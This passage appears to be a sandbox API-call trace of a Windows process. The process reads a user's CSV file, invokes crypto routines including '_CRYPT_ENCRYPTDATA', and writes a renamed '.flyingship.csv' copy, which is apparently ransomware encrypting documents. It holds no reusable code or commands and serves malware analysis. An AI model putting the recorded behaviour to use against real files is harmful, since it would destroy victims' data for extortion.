| out: lpMsg=0x87ee3c) returned 0 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.202] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0177.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.203] CryptDestroyHash (hHash=0x90af58) returned 1 [0177.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.209] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.209] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.209] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.209] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\-v0 o3_nr9rc3_2dhh4.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.210] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.210] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.211] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0177.211] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0177.211] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0177.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0177.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0177.213] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0177.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0177.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0177.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0177.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\-v0 o3_nr9rc3_2dhh4.flyingship.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.218] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0177.218] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0177.218] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0177.218] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0177.219] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0177.219] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xd24a, lpOverlapped=0x0) returned 1 [0177.222] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0177.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd24a) returned 0xbea018 [0177.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0177.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd24a) returned 0xbf7270 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.224] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd24a) returned 0xbea018 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0177.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.225] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd24a) returned 0xbea018 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd24a) returned 0xa5f008 [0177.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0177.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0177.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0177.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 